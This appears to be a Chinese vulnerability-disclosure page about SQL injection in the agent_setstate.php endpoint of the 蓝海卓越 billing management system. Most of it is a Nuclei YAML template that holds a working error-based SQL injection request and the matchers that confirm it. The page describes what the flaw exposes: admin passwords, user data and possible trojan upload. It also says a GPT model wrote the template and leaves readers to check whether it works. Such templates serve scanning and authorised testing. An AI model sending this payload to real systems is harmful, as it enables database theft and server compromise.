简介
蓝海卓越计费管理系统中的agent_setstate.php存在SQL注入的风险的接口,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
FOFA
漏洞复现
Nuclei Yaml
id: lanhaizhuoyue-agent-setstate-sql-injection
info:
name: 蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞复现
author: doc.vulexp.cn
severity: high
description: |
蓝海卓越计费管理系统的 agent_setstate.php 页面存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句获取数据库信息。
variables:
a: "{{rand_int(100, 999)}}"
http:
- raw:
- |
GET /agent_setstate.php?id=(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(0x717a767071,(SELECT%20(ELT(6154=6154,{{a}}))),0x7170716a71,0x78))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "BIGINT value"
- type: regex
regex:
- "qzvpq{{a}}qpqjqx"
Yaml文件由GPT模型生成,自行检查是否可用!
THE END
暂无评论内容